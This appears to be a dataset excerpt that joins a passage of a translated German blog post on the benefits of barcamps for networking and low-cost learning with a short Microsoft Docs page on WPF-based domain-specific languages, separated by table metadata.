My tip: take a look at the other participants beforehand, during the barcamp, or afterwards. Many barcamp organizers partner with Xing for ticketing, for example Barcamp Koblenz, which takes place on 17–18 June 2016. After buying a ticket you can see the other participants.
Take a targeted look at the people who are “interesting” for you, who do your dream job or work in the industry you would like to get into. If a quick Google or social media search shows you that a particular person is really exciting for you, use the barcamp to approach him or her. An invitation for a coffee beforehand can also be a good idea. That, by the way, is how Jana and I met – today we are blog partners and co-founders. Which shows once again: you never know what might develop!
Everything right on your doorstep
What I find particularly cool about barcamps is that they have a strong regional character. Ever since Kraftklub we have known: not everyone wants to move to Berlin, and there is absolutely no need to. There are great initiatives, people and events elsewhere too. This regional focus is perfect for anyone who wants to look around and see what and who else is out there in their region. That is a good thing for freelancers as well as for applicants and employees.
Professional development on a small budget
Have you ever looked up what a social media training course actually costs? And a workshop on programming basics? Not to mention a public speaking seminar. Er…, is there a cheaper version of that?
The answer is: yes! At a barcamp there is a lovely, lively give and take. An “expert” on a topic offers a session free of charge, simply to share their knowledge with others. You can attend any session, just like that. Of course you can also offer a session or a talk yourself – but you don't have to.
So you can shamelessly benefit from the concentrated know-how of the other participants. I personally have learned things I had always wanted to know more about – from search engine optimization and the best WordPress plugins to Creative Commons images. To get a more precise impression of the range of topics at a barcamp, just have a look at a sample session plan. There is something interesting for every taste and every level of knowledge. In the end, the real problem is actually deciding among the mass of high-quality sessions!
You can get involved yourself
As I said, you can also offer sessions yourself and thereby get involved, position yourself and become visible. There is no need to be nervous, because nobody expects you to deliver a perfect stage show. What are you good at, what topic are you passionate about, what could you talk about for hours? There are certainly people who are interested in your know-how and your perspective. Back then, someone very nice convinced me over a beer to hold my own session on blogging and work. Although I was of course nervous beforehand, it went really well and I enjoyed it a lot. Since then I have been giving talks regularly and gladly, passing on my knowledge here on the blog, on YouTube and, recently, even in webinars. Who knows how far it will take you if you dare?
| 131.396552 | 805 | 0.812361 | deu_Latn | 0.999706 |
e05c9c33e38ed35a1fecc3a3a1ce2a512d964b36 | 1,272 | md | Markdown | docs/vs-2015/modeling/creating-a-wpf-based-domain-specific-language.md | Birgos/visualstudio-docs.de-de | 64595418a3cea245bd45cd3a39645f6e90cfacc9 | ["CC-BY-4.0", "MIT"] | null | null | null | docs/vs-2015/modeling/creating-a-wpf-based-domain-specific-language.md | Birgos/visualstudio-docs.de-de | 64595418a3cea245bd45cd3a39645f6e90cfacc9 | ["CC-BY-4.0", "MIT"] | null | null | null | docs/vs-2015/modeling/creating-a-wpf-based-domain-specific-language.md | Birgos/visualstudio-docs.de-de | 64595418a3cea245bd45cd3a39645f6e90cfacc9 | ["CC-BY-4.0", "MIT"] | null | null | null |
---
title: Creating a WPF-Based Domain-Specific Language | Microsoft Docs
ms.custom: ''
ms.date: 11/15/2016
ms.prod: visual-studio-tfs-dev14
ms.reviewer: ''
ms.suite: ''
ms.tgt_pltfrm: ''
ms.topic: article
ms.assetid: 917519ad-138f-4869-8158-243014c7ca1d
caps.latest.revision: 8
author: gewarren
ms.author: gewarren
manager: douge
ms.openlocfilehash: 2d8884aa3e9a3fcbffe6c2bb962f69384b00383d
ms.sourcegitcommit: 9ceaf69568d61023868ced59108ae4dd46f720ab
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 10/12/2018
ms.locfileid: "49281085"
---
# <a name="creating-a-wpf-based-domain-specific-language"></a>Creating a WPF-Based Domain-Specific Language
[!INCLUDE[vs2017banner](../includes/vs2017banner.md)]
You can create a domain-specific language that has a WPF-based designer instead of a graphical designer.
Information and examples for this feature can be found on the Visual Studio Visualization & Modeling Tools website at [http://go.microsoft.com/fwlink/?LinkId=186128](http://go.microsoft.com/fwlink/?LinkId=186128).
## <a name="see-also"></a>See Also
[How to Define a Domain-Specific Language](../modeling/how-to-define-a-domain-specific-language.md)
| 37.411765 | 241 | 0.794811 | deu_Latn | 0.703629 |